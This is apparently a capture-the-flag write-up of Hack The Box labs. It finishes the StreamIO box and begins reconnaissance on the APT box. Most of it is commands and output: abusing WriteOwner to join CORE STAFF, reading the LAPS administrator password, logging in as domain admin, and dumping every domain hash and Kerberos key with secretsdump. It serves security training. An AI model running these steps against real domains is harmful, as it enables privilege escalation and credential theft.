┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]                                                       
└─# neo4j restart    
。。。                                    

After opening the BloodHound UI, import the .zip, search for the assets already compromised and mark them as owned, then on that user's node run the shortest-path query:
(screenshot 2024-02-27-14-42-11)
Then set the target DC as the ending node:
(screenshot 2024-02-27-14-45-14)
Click Help on any edge of the path for the abuse details:
(screenshot 2024-02-27-14-46-31)

How BloodHound relates to manual collection

BloodHound is not magic: it is the same information we would collect by hand in the domain, stitched together. For example:

*Evil-WinRM* PS C:\Users\nikk37\Documents> net user JDgodd
User name                    JDgodd
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/22/2022 1:56:42 AM
Password expires             Never
Password changeable          2/23/2022 1:56:42 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/26/2022 10:17:08 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\nikk37\Documents> dsget user "CN=jdgodd,CN=users,DC=streamio,DC=htb" -memberof -expand
"CN=Domain Users,CN=Users,DC=streamIO,DC=htb"
"CN=Users,CN=Builtin,DC=streamIO,DC=htb"

*Evil-WinRM* PS C:\Users\nikk37\Documents> net groups

Group Accounts for \\

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*CORE STAFF
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.

# For example, we are interested in the group 'CORE STAFF' and want more details on it, so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> get-adgroup "core staff"


DistinguishedName : CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
GroupCategory     : Security
GroupScope        : Global
Name              : CORE STAFF
ObjectClass       : group
ObjectGUID        : 113400d4-c787-4e58-91ad-92779b38ecc5
SamAccountName    : CORE STAFF
SID               : S-1-5-21-1470860369-1569627196-4264678630-1108

# if we want to know its acl:
*Evil-WinRM* PS C:\Users\nikk37\Documents> (get-acl "AD:CN=CORE STAFF,CN=Users,DC=streamio,DC=htb").access
。。。
ActiveDirectoryRights : WriteOwner
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : streamIO\JDgodd
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
。。。
# This is the permission of interest, and it is granted to JDgodd: the same edge BloodHound shows us.
# The full ACL is long and the key entry is easy to miss, so filter it down to the principals we already control:
*Evil-WinRM* PS C:\Users\nikk37\Documents> (get-acl "AD:CN=CORE STAFF,CN=Users,DC=streamio,DC=htb").access | where-object { $_.IdentityReference -like "*jdgodd*"}


ActiveDirectoryRights : WriteOwner
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : streamIO\JDgodd
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
# Beyond the ACL on the group itself, we need to know what a group can do to computers in the domain; first, list the computer objects:
*Evil-WinRM* PS C:\Users\nikk37\Documents> get-adcomputer -filter *


DistinguishedName : CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
DNSHostName       : DC.streamIO.htb
Enabled           : True
Name              : DC
ObjectClass       : computer
ObjectGUID        : 8c0f9a80-aaab-4a78-9e0d-7a4158d8b9ee
SamAccountName    : DC$
SID               : S-1-5-21-1470860369-1569627196-4264678630-1000
UserPrincipalName :
# Then walk every OU, read its ACL and keep the ACEs that reference CORE STAFF:
*Evil-WinRM* PS C:\Users\nikk37\Documents> get-adorganizationalunit -filter * | %{ (get-acl "Ad:$($_.distinguishedname)").access } | where-object { $_.identityreference -like "*core*"}


ActiveDirectoryRights : ReadProperty, ExtendedRight
InheritanceType       : Descendents
ObjectType            : a156e052-fb12-45bc-9a00-056271040d9f
InheritedObjectType   : bf967a86-0de6-11d0-a285-00aa003049e2
ObjectFlags           : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : streamIO\CORE STAFF
IsInherited           : False
InheritanceFlags      : ContainerInherit
PropagationFlags      : InheritOnly

ActiveDirectoryRights : ReadProperty
InheritanceType       : Descendents
ObjectType            : a0ffa854-9b42-45fa-bd07-4e1a651f2610
InheritedObjectType   : bf967a86-0de6-11d0-a285-00aa003049e2
ObjectFlags           : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : streamIO\CORE STAFF
IsInherited           : False
InheritanceFlags      : ContainerInherit
PropagationFlags      : InheritOnly
# Both ACEs are inherit-only on the OU and apply to descendant objects of class computer (InheritedObjectType bf967a86-0de6-11d0-a285-00aa003049e2 is the schema GUID of the computer class).
# The first grants ReadProperty plus ExtendedRight on a single attribute (the ObjectType GUID). That is exactly the ACE LAPS creates for reading ms-Mcs-AdmPwd: the attribute is confidential, so reading it needs the control-access right on top of ReadProperty.
# We saw LAPS in the installed software earlier, so CORE STAFF can read the Administrator password LAPS manages on the DC. That is the escalation path BloodHound drew.

So the escalation path is: use JDgodd's WriteOwner on CORE STAFF to add JDgodd to that group, then read the LAPS password as a member of the group.
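The manual steps above are what BloodHound's graph query does mechanically. The following added example (written for this post, not BloodHound's code) turns the ACEs and memberships transcribed from the Get-Acl and net user output above into a small graph and searches it for a path from an owned principal to a LAPS read. The computer-class GUID is well known; the ms-Mcs-AdmPwd GUID is assumed to be the one in the page's first CORE STAFF ACE (LAPS generates it per forest), the second GUID is assumed to be the expiration-time attribute, and nikk37's Domain Users membership is assumed:

```python
"""Tiny 'BloodHound by hand': build a graph from ACEs and group memberships and
search for a path from an owned principal to reading ms-Mcs-AdmPwd.
Added example for this post, not BloodHound's code. ACE data is transcribed
from the page's Get-Acl output; items marked (assumed) are not on the page."""
from collections import deque

NULL_GUID = "00000000-0000-0000-0000-000000000000"
# schemaIDGUID of the 'computer' class (well known); it is the InheritedObjectType
# in the page's CORE STAFF ACEs.
COMPUTER_CLASS = "bf967a86-0de6-11d0-a285-00aa003049e2"
# LAPS creates a forest-specific schemaIDGUID for ms-Mcs-AdmPwd; the page's first
# ACE carries ReadProperty+ExtendedRight on this GUID, so we assume that is it.
LAPS_PWD_GUID = "a156e052-fb12-45bc-9a00-056271040d9f"
# Second GUID in the page's output, ReadProperty only (assumed: expiration time).
OTHER_ATTR_GUID = "a0ffa854-9b42-45fa-bd07-4e1a651f2610"

ACES = [
    {"on": "CORE STAFF", "kind": "group", "who": "JDgodd", "type": "Allow",
     "rights": {"WriteOwner"}, "objtype": NULL_GUID, "inhtype": NULL_GUID},
    {"on": "OU=Domain Controllers", "kind": "ou", "who": "CORE STAFF", "type": "Allow",
     "rights": {"ReadProperty", "ExtendedRight"}, "objtype": LAPS_PWD_GUID, "inhtype": COMPUTER_CLASS},
    {"on": "OU=Domain Controllers", "kind": "ou", "who": "CORE STAFF", "type": "Allow",
     "rights": {"ReadProperty"}, "objtype": OTHER_ATTR_GUID, "inhtype": COMPUTER_CLASS},
]
MEMBERS = {"Domain Users": {"JDgodd", "nikk37"}, "CORE STAFF": set()}  # nikk37 (assumed)
CONTAINED = {"OU=Domain Controllers": ["DC"]}  # computer objects under each OU (get-adcomputer)

# Rights on a group that let the holder end up controlling its member list:
# WriteOwner (take ownership, then grant yourself rights), WriteDacl, GenericAll/Write.
MEMBERSHIP_CONTROL = {"WriteOwner", "WriteDacl", "GenericAll", "GenericWrite"}


def grants_laps_read(ace):
    """ms-Mcs-AdmPwd is a confidential attribute: reading it needs both ReadProperty
    and the ExtendedRight (control-access) bit on that attribute, or GenericAll."""
    if ace["type"] != "Allow":
        return False
    if "GenericAll" in ace["rights"]:
        return True
    if not {"ReadProperty", "ExtendedRight"} <= ace["rights"]:
        return False
    return ace["objtype"] in (NULL_GUID, LAPS_PWD_GUID)


def edges_from(principal):
    """Outgoing edges: MemberOf, membership control over a group, ReadLAPSPassword."""
    edges = []
    for group, members in MEMBERS.items():
        if principal in members:
            edges.append((principal, "MemberOf", group))
    for ace in ACES:
        if ace["who"] != principal or ace["type"] != "Allow":
            continue
        if ace["kind"] == "group" and ace["rights"] & MEMBERSHIP_CONTROL:
            edges.append((principal, "|".join(sorted(ace["rights"] & MEMBERSHIP_CONTROL)), ace["on"]))
        elif ace["kind"] == "computer" and grants_laps_read(ace):
            edges.append((principal, "ReadLAPSPassword", ace["on"]))
        elif ace["kind"] == "ou" and grants_laps_read(ace) and ace["inhtype"] in (NULL_GUID, COMPUTER_CLASS):
            # inherit-only ACE on the OU applies to the computer objects beneath it
            for computer in CONTAINED.get(ace["on"], []):
                edges.append((principal, "ReadLAPSPassword", computer))
    return edges


def find_path(owned):
    """BFS from an owned principal; returns the edge list to the first LAPS read, or None."""
    queue, seen = deque([(owned, [])]), {owned}
    while queue:
        node, path = queue.popleft()
        for edge in edges_from(node):
            _, rel, nxt = edge
            if rel == "ReadLAPSPassword":
                return path + [edge]
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [edge]))
    return None


if __name__ == "__main__":
    for user in ("JDgodd", "nikk37"):
        print(user, "->", find_path(user))
```

For JDgodd the search returns the WriteOwner edge to CORE STAFF followed by the ReadLAPSPassword edge to DC; for nikk37, who only sits in Domain Users, it returns nothing, and the ReadProperty-only ACE on the second attribute is correctly rejected because it lacks the control-access bit. To use this on a real domain, feed it every ACE from `(Get-Acl "AD:<dn>").Access` over the groups and OUs you care about.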

Privilege escalation
Adding the user to the group with PowerView

Turning WriteOwner into group membership is easiest with a third-party toolkit such as PowerView. With only WriteOwner the usual order is: take ownership of the object, grant yourself rights on its DACL, then add the member.
URL:
https://github.com/cvestone/PowerSploit/blob/master/Recon/PowerView.ps1
Download or copy the script locally, then upload it to the target through evil-winrm:

*Evil-WinRM* PS C:\programdata> upload /home/cvestone/Desktop/htb/StreamIO/PowerView.ps1
                                        
Info: Uploading /home/cvestone/Desktop/htb/StreamIO/PowerView.ps1 to C:\programdata\PowerView.ps1
Progress: 55% : |▓▓▓▓▒░░░░░|          
                                        
Data: 4190544 bytes of 4190544 bytes copied
                                        
Info: Upload successful!
# Then dot-source the script so its functions load into the session
*Evil-WinRM* PS C:\Users\nikk37\Documents> . .\powerview.ps1
# Then add the user to the group. This run skipped Set-DomainObjectOwner; if Add-DomainObjectAcl is denied with only WriteOwner, take ownership with it first.
*Evil-WinRM* PS C:\Users\nikk37\Documents> $pass =convertto-securestring 'JDg0dd1s@d0p3cr3@t0r' -AsplainText -force
*Evil-WinRM* PS C:\programdata> $cred =new-object system.management.automation.pscredential('streamio.htb\jdgodd',$pass)
*Evil-WinRM* PS C:\programdata> add-domainobjectacl -Credential $cred -Targetidentity "Core Staff" -principalIdentity "streamio\jdgodd"
*Evil-WinRM* PS C:\programdata> add-domaingroupmember -credential $cred -identity "Core Staff" -members "streamio\jdgodd"
*Evil-WinRM* PS C:\programdata> net user jdgodd
User name                    JDgodd
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/22/2022 1:56:42 AM
Password expires             Never
Password changeable          2/23/2022 1:56:42 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/29/2024 3:13:43 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *CORE STAFF
The command completed successfully.
# Done: jdgodd is now a member of CORE STAFF.

Reading LAPS to obtain the domain Administrator credential

Now read the LAPS attribute. The WinRM session belongs to nikk37, so authenticate explicitly as jdgodd; a fresh logon is needed in any case, because the new group membership only appears in tokens issued after the change:

*Evil-WinRM* PS C:\programdata> get-adcomputer dc -properties * -credential $cred
。。。
*Evil-WinRM* PS C:\programdata> get-adcomputer -filter * -properties ms-Mcs-AdmPwd -credential $cred
。。。

If that does not return the attribute, there are other ways:

# First way: ask LDAP directly for every object that carries ms-Mcs-AdmPwd
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# ldapsearch -H ldap://10.129.170.48 -b "dc=streamio,dc=htb" -x -D jdgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCs-admpwd=*)" ms-mcs-admpwd
# extended LDIF
#
# LDAPv3
# base <dc=streamio,dc=htb> with scope subtree
# filter: (ms-MCs-admpwd=*)
# requesting: ms-mcs-admpwd 
#

# DC, Domain Controllers, streamIO.htb
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: 7hcr@&{jI91l7M

# search reference
ref: ldap://ForestDnsZones.streamIO.htb/DC=ForestDnsZones,DC=streamIO,DC=htb

# search reference
ref: ldap://DomainDnsZones.streamIO.htb/DC=DomainDnsZones,DC=streamIO,DC=htb

# search reference
ref: ldap://streamIO.htb/CN=Configuration,DC=streamIO,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

# Second way: crackmapexec --laps reads the attribute and then tries it as the target's local Administrator. The logon fails because a DC has no local SAM accounts, but the retrieved password is right there in the output:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb streamio.htb -u jdgodd -p 'JDg0dd1s@d0p3cr3@t0r' --laps --ntds                   
SMB         streamio.htb    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         streamio.htb    445    DC               [-] DC\administrator:7hcr@&{jI91l7M STATUS_LOGON_FAILURE 

That is the Administrator password managed by LAPS on the DC, i.e. the domain Administrator's.
Try connecting with it:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# evil-winrm -u administrator -p '7hcr@&{jI91l7M' -i streamio.htb
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami                                                                                                                    
streamio\administrator                                                                                                                                                      
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../                                                                                                                    
*Evil-WinRM* PS C:\Users\Administrator> ls                                                                                                   
    Directory: C:\Users\Administrator                                      
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        2/22/2022   1:33 AM                3D Objects
d-r---        2/22/2022   1:33 AM                Contacts
d-r---        5/30/2022   4:53 PM                Desktop
d-r---        2/26/2022  12:41 PM                Documents
d-r---        2/22/2022   1:33 AM                Downloads
d-r---        2/22/2022   1:33 AM                Favorites
d-r---        2/22/2022   1:33 AM                Links
d-r---        2/22/2022   1:33 AM                Music
d-r---        2/22/2022   1:33 AM                Pictures
d-r---        2/22/2022   1:33 AM                Saved Games
d-r---        2/22/2022   1:33 AM                Searches
d-r---        2/22/2022   1:33 AM                Videos


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../../
*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:48 AM                .NET v4.5
d-----        2/22/2022   2:48 AM                .NET v4.5 Classic
d-----        2/26/2022  10:20 AM                Administrator
d-----         5/9/2022   5:38 PM                Martin
d-----        2/26/2022   9:48 AM                nikk37
d-r---        2/22/2022   1:33 AM                Public


*Evil-WinRM* PS C:\Users> cd martin
*Evil-WinRM* PS C:\Users\martin> cd desktop
*Evil-WinRM* PS C:\Users\martin\desktop> ls


    Directory: C:\Users\martin\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/29/2024   2:54 AM             34 root.txt
*Evil-WinRM* PS C:\Users\martin\desktop> type root.txt
b97157078aa375824e9cf9d9ac12c8eb

With that we have the Administrator flag.

A small extra check

How can we further confirm that the box we took is a domain controller? With a domain-admin credential against a DC we can dump every credential in the domain: secretsdump first pulls the local SAM and LSA secrets through the remote registry, then replicates the NTDS.DIT secrets over DRSUAPI (the same mechanism as DCSync). The NT hashes it returns can afterwards be used for pass-the-hash:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# /usr/share/doc/python3-impacket/examples/secretsdump.py 'streamio.htb/administrator:7hcr@&{jI91l7M'@streamio.htb
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x4dbf07084a530cfa7ab417236bd4a647
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6a559f691b75bff16a07ecbd12e3bdfb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets                                                                                                                                                    
[*] $MACHINE.ACC                                                                                                                                                            
streamIO\DC$:aes256-cts-hmac-sha1-96:eb69ddfa9a4b725ebff4522fff46da774d2029fc19f79a6252b7fc6d07485def                                                                       
streamIO\DC$:aes128-cts-hmac-sha1-96:27748f416a29158e00e4d40a4d182d33                                                                                                       
streamIO\DC$:des-cbc-md5:380bb370c7236ec8                                                                                                                                   
streamIO\DC$:plain_password_hex:810cfa628253e7db1ad4d299b8d385a042451764d8b8512c58d603dab8fb6255ffea028f0a02a823116d8b2c7eefff60499c6498e95827077bc5495b4dbbd8fb5fe3095afca5
5f051384ece642645a2aa18233b4d60a11a4d3ea7b29de594a8213ff23043789a3e64054bbf6cef97778d95c346e36b03b41cb32ca80bb6110bbb13d03174c8522e44b0e5da9899c0cb4a30a382990ba49fb68aecad7
83e3d56906d50b827c13a0b25701da705684f2cdc9e553b69ebe81f5012e2c221594e10df542b544d2fa9550f3941db439dba1a786fd2beb1df27376fbbeded088bb8a86830876d86b5eb155a4dfa3f2181e8e35    
streamIO\DC$:aad3b435b51404eeaad3b435b51404ee:f9b55c504da537ad590220bd0d28774f:::                                                                                           
[*] DPAPI_SYSTEM                                                                                                                                                            
dpapi_machinekey:0xd8b78bca07d4bce21bce1ae04bf231978c84407f                                                                                                                 
dpapi_userkey:0x9b682d0f5f9b63c03827113581bc2dc4f993e3ee                                                                                                                    
[*] NL$KM                                                                                                                                                                   
 0000   A5 68 6C 6F 0F D6 72 8F  9E DE A2 27 47 D1 73 3A   .hlo..r....'G.s:                                                                                                 
 0010   EA FB 23 4A 58 C9 04 91  95 A2 E7 3C 63 1A E8 B1   ..#JX......<c...                                                                                                 
 0020   DA D8 C8 95 DD 09 23 97  A5 5A 21 74 17 17 CC C6   ......#..Z!t....                                                                                                 
 0030   5E 1B F7 BE 34 99 DC 39  D1 72 7B 3E 19 B6 B2 3C   ^...4..9.r{>...<                                                                                                 
NL$KM:a5686c6f0fd6728f9edea22747d1733aeafb234a58c9049195a2e73c631ae8b1dad8c895dd092397a55a21741717ccc65e1bf7be3499dc39d1727b3e19b6b23c                                      
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                               
[*] Using the DRSUAPI method to get NTDS.DIT secrets                                                                                                                        
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e8888d458703384be8f16508b9f9cc84:::                                                                                      
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                              
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::                                                                                             
JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::                                                                                            
Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::                                                                                            
nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::                                                                                            
yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::                                                                                         
DC$:1000:aad3b435b51404eeaad3b435b51404ee:f9b55c504da537ad590220bd0d28774f:::                                                                                               
[*] Kerberos keys grabbed                                                                                                                                                   
Administrator:aes256-cts-hmac-sha1-96:c71b0faaa98af8d80722331c61e9f727c6f9fc246f0e9acce83ed37ce5285147                                                                      
Administrator:aes128-cts-hmac-sha1-96:a14783c47207809883c1b3b003dfb553                                                                                                      
Administrator:des-cbc-md5:49b5fb4c64755829
krbtgt:aes256-cts-hmac-sha1-96:668ee76d84bf5ea1e845933ace27ecde98b736f218c0830cbe71e18812166cda
krbtgt:aes128-cts-hmac-sha1-96:f91f8540a9aca4af627959d1cb888f13
krbtgt:des-cbc-md5:d032029279fbc4fd
JDgodd:aes256-cts-hmac-sha1-96:53fcc54b04d560253b0fdb259b9de0da8c5c65916d12b5e4b5dd4723d9003443
JDgodd:aes128-cts-hmac-sha1-96:22e9e5268e40d1fc8198415fdd6c64bd
JDgodd:des-cbc-md5:76d0fe1a231934e5
Martin:aes256-cts-hmac-sha1-96:d5eed6cafcabd393a2101f4fadc143344c48ebaacb065490510ef608424065f0
Martin:aes128-cts-hmac-sha1-96:0a0cff37d02d1299a24fe58debb20392
Martin:des-cbc-md5:570bfd51e9f7e3bf
nikk37:aes256-cts-hmac-sha1-96:d4a44efe5740231cad3da85c294b01678840ac7a5b6207f366c36fc3c5b59347
nikk37:aes128-cts-hmac-sha1-96:eaff7bb14b5c41f80e5216cb09e16435
nikk37:des-cbc-md5:ae5ddf8fc2853e67
yoshihide:aes256-cts-hmac-sha1-96:0849b8c4eaee4edeaed2972752529251bbb616e9f24e08992923b4f18e9d73b0
yoshihide:aes128-cts-hmac-sha1-96:d668308ea96ebda1d31e3bb77b8e6768
yoshihide:des-cbc-md5:3bae5257ea029d61
DC$:aes256-cts-hmac-sha1-96:eb69ddfa9a4b725ebff4522fff46da774d2029fc19f79a6252b7fc6d07485def
DC$:aes128-cts-hmac-sha1-96:27748f416a29158e00e4d40a4d182d33
DC$:des-cbc-md5:89d95129f7c13119
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
。。。

Summary

(to be written when reviewing the box)

APT

“红队笔记” (Red Team Notes) study log

Machine introduction

APT is an insane difficulty Windows machine where RPC and HTTP services are only exposed. Enumeration of existing RPC interfaces provides an interesting object that can be used to disclose the IPv6 address. The box is found to be protected by a firewall exemption that over IPv6 can give access to a backup share. User enumeration and bruteforce attacks can give us access to the registry which contains login credentials. The machine is configured to allow authentication via the NTLMv1 protocol, which can be leveraged to gain system access.

Difficulty

Insane

Information gathering

Full TCP port scan

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -sT --min-rate 10000 -p- $ip1 -oA nmapscan/tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 14:59 CST
Nmap scan report for 10.129.96.60
Host is up (0.23s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc

Nmap done: 1 IP address (1 host up) scanned in 46.32 seconds

Extract the open ports:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# tcports=$(grep open nmapscan/tcports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
echo $tcports
80,135

Detailed TCP scan

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -sT -sC -sV -O -p80,135 $ip1 -oA nmapscan/tcpdetails 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 15:05 CST
Nmap scan report for 10.129.96.60
Host is up (0.21s latency).

PORT    STATE SERVICE VERSION
80/tcp  open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
135/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.68 seconds

UDP scan

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -sU -p- --min-rate 10000 10.129.96.60 -oA nmapscan/udports      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 15:10 CST
Nmap scan report for 10.129.96.60
Host is up (0.14s latency).
All 65535 scanned ports on 10.129.96.60 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 14.26 seconds

Nothing found. Note that every port came back open|filtered (no response), which is what a firewall silently dropping UDP looks like, so this scan is inconclusive rather than proof that no UDP service exists.

Vulnerability script scan

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap --script=vuln -p80,135 10.129.96.60 -oA nmapscan/vuln 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 15:08 CST
Stats: 0:02:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.03% done; ETC: 15:10 (0:00:02 remaining)
Stats: 0:04:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.51% done; ETC: 15:12 (0:00:01 remaining)
Stats: 0:06:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.51% done; ETC: 15:14 (0:00:02 remaining)
Nmap scan report for 10.129.96.60
Host is up (0.23s latency).

PORT    STATE SERVICE
80/tcp  open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.96.60
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.129.96.60:80/support.html
|     Form id: 
|_    Form action: https://10.13.38.16/contact-post.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
135/tcp open  msrpc

Nmap done: 1 IP address (1 host up) scanned in 741.60 seconds

Scan result analysis

The results are limited. The obvious priority is the web service on port 80; msrpc comes last.

Exploitation

Visiting the web service

(screenshot 2024-03-02-15-20-50)
Clicking through most of the site's functions only redirects back to the home page, so the site is still an unfinished placeholder demo. It looks as if it was built from some CMS template and is mostly static, with nothing to work with except SUPPORT:
(screenshot 2024-03-02-15-34-21)
The form posts its data to a different IP address, which suggests there is more than one host on the internal network:
(screenshot 2024-03-02-15-37-35)
Given that, there is little point trying SQL injection or XSS against it for now, so set it aside.

Directory brute force

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# gobuster dir -u http://10.129.96.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.96.60
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 150] [--> http://10.129.96.60/images/]
/Images               (Status: 301) [Size: 150] [--> http://10.129.96.60/Images/]
/css                  (Status: 301) [Size: 147] [--> http://10.129.96.60/css/]
/js                   (Status: 301) [Size: 146] [--> http://10.129.96.60/js/]
/fonts                (Status: 301) [Size: 149] [--> http://10.129.96.60/fonts/]
/IMAGES               (Status: 301) [Size: 150] [--> http://10.129.96.60/IMAGES/]
/Fonts                (Status: 301) [Size: 149] [--> http://10.129.96.60/Fonts/]
/CSS                  (Status: 301) [Size: 147] [--> http://10.129.96.60/CSS/]
/JS                   (Status: 301) [Size: 146] [--> http://10.129.96.60/JS/]
===============================================================
Finished
===============================================================

Nothing special, and the directories themselves are not browsable.

Reviewing the source

(screenshot 2024-03-02-16-14-36)
Since we guessed a CMS, the source (especially the comments) might leak information. It turns out the site is not a CMS at all: it is a mirror of the other IP seen a moment ago, made with HTTrack Website Copier, and the comment names the tool. The next step is to check whether that tool has any public vulnerabilities.

Looking for public vulnerabilities

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# searchsploit HTTrack Website Copier
Exploits: No Results
Shellcodes: No Results                                   
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# searchsploit HTTrack Website       
Exploits: No Results
Shellcodes: No Results                          
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# searchsploit HTTrack        
Exploits: No Results
Shellcodes: No Results

Search:
(screenshot 2024-03-02-16-19-18)
HTTrack has had vulnerabilities, so look at the details.
But HTTrack is a desktop binary, not a web application exposed on the server, and it opens no port we can talk to, so the public buffer overflow and DLL hijacking issues are unusable here. This path is a dead end and not worth the time to reproduce.

Checking the images for hidden data

The usual approaches have all been tried and found nothing usable, so download the site's images and check them for steganography or embedded data:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# wget http://10.129.96.60/images/p2.jpg
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
